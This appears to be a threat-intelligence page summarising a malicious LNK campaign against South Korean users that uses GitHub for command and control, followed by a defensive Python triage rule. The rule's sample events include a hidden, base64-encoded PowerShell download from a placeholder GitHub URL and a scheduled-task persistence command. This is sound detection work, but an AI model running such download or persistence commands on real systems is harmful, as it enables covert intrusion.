Malicious LNK GitHub C2 campaign targeting South Korea
Campaign
Summary
A malicious LNK-file campaign targeting users in South Korea is using GitHub as C2 to support persistent access on Windows systems. The operation relies on PowerShell, scheduled tasks, and decoy PDFs to stay hidden while malicious code runs. Recent variants add embedded decoding logic and encoded payloads, showing an evolving threat that has continued since 2024.
Related Happenings
Shai-Hulud supply-chain campaign spreading via stolen CI/CD credentials
Campaign
First: 12.05.2026 14:29
Last: 12.05.2026 14:29
Sources 1
About this happening:
The **Shai-Hulud** **supply-chain campaign** remains active across **npm**, **PyPI**, and **Composer**, with the latest reporting tying **TeamPCP** to both a claimed **GitHub inte...
EtherRAT malicious MSI loader with Ethereum-based C2
Malware Activity
First: 30.04.2026 14:30
Last: 30.04.2026 14:30
Sources 1
About this happening:
The **EtherRAT** malware is being delivered through **malicious MSI installers** and gives attackers **persistent Windows access**, increasing the risk of covert control inside en...
Famous Chollima PromptMink supply-chain campaign targeting Web3 developers
Campaign
First: 29.04.2026 17:43
Last: 29.04.2026 17:43
Sources 1
About this happening:
The **PromptMink** campaign is widening **Famous Chollima**'s supply-chain intrusion playbook by pushing **tainted npm packages** into developer environments and stealing secrets....
Tropic Trooper trojanized SumatraPDF remote-access campaign
Campaign
First: 24.04.2026 12:29
Last: 24.04.2026 12:29
Sources 1
About this happening:
**Tropic Trooper** is running an active **campaign** that uses a **trojanized SumatraPDF** lure to plant **AdaptixC2 Beacon** and later abuse **VS Code tunnels** for remote access...
Transparent Tribe AI-assisted implant campaign targeting India
Campaign
First: 06.03.2026 17:11
Last: 06.03.2026 17:11
Sources 1
About this happening:
**Transparent Tribe (APT36)** is using **AI-powered coding tools** to mass-produce disposable implants in an active **campaign** targeting the **Indian government**, its embassies...
Timeline
02.04.2026 16:00 (2 articles)
Fortinet advisory describes South Korea LNK malware campaign using GitHub C2
Technical Analysis Update
Fortinet published an advisory describing a malicious LNK-file campaign targeting users in South Korea that uses GitHub as command and control (C2). The operation relies on hidden scripts, encoded payloads, PowerShell, VBScript, scheduled tasks, decoy PDF documents, and Windows built-in tools to maintain persistence, exfiltrate system information, and evade detection. Later variants add decoding functions directly in the LNK arguments and remove identifying metadata; earlier versions of the attack date back to 2024.
Sources:
- GitHub Used as Covert Channel in Multi-Stage Malware Campaign — www.infosecurity-magazine.com — 02.04.2026 16:00
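As an added defender-side example (not code from the Fortinet advisory or the articles above), the Python triage rule below scores constructed process-creation records against the techniques listed in this entry: an encoded PowerShell command started as a child of explorer.exe (how a double-clicked LNK launches its target), a GitHub URL in the raw or decoded command line, and a scheduled task whose action is a script host. The event fields, file paths, task name and GitHub repository path are all constructed placeholders, not indicators from the campaign.

```python
import base64
import re

# Constructed sample payload: a download one-liner encoded as -EncodedCommand expects (UTF-16LE text, then base64).
INNER_COMMAND = "iwr https://raw.githubusercontent.com/placeholder-org/placeholder-repo/main/p.txt"
ENC_PAYLOAD = base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode()
# Constructed process-creation records (Sysmon Event ID 1 style fields; all paths and names are placeholders).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": f"powershell.exe -w hidden -nop -enc {ENC_PAYLOAD}"},
    {"id": 2, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /sc minute /mo 30 /tn "Updater" /tr "powershell.exe -w hidden -f C:\Users\Public\u.ps1"'},
    {"id": 3, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Adobe\Reader\AcroRd32.exe",
     "cmd": r'"AcroRd32.exe" C:\Users\u\Downloads\report.pdf'},  # benign decoy-PDF open, must not fire
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Date"},  # plain interactive use, must not fire
]
GITHUB_RE = re.compile(r"raw\.githubusercontent\.com|api\.github\.com|github\.com", re.I)
ENC_FLAG_RE = re.compile(r"\s-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe")

def decode_encoded_command(cmd):
    """Return the text behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(ev):
    """Return the campaign-style indicators matched by one process-creation record."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
    decoded = decode_encoded_command(cmd)
    findings = []
    # A double-clicked LNK runs its target as a child of explorer.exe; an encoded script host there is the entry point.
    if image.endswith(SCRIPT_HOSTS) and parent.endswith("explorer.exe") and (decoded or "frombase64string" in cmd.lower()):
        findings.append("encoded script launched from explorer.exe (shortcut entry point)")
    # GitHub as the C2 channel: check the raw command line and the decoded payload.
    if GITHUB_RE.search(cmd) or (decoded and GITHUB_RE.search(decoded)):
        findings.append("GitHub URL in script command line (possible C2 fetch)")
    # Persistence via a scheduled task whose action is itself a script host.
    if image.endswith("schtasks.exe") and "/create" in cmd.lower() and re.search(r"powershell|pwsh|wscript|cscript|mshta", cmd, re.I):
        findings.append("scheduled task pointing at a script host (persistence)")
    return findings

def triage(events):
    # Map event id to findings for every record that matched at least one indicator.
    return {ev["id"]: hits for ev in events if (hits := triage_event(ev))}
```

Running `triage(SAMPLE_EVENTS)` flags events 1 and 2 only; the decoy-PDF open and the plain PowerShell session produce no findings.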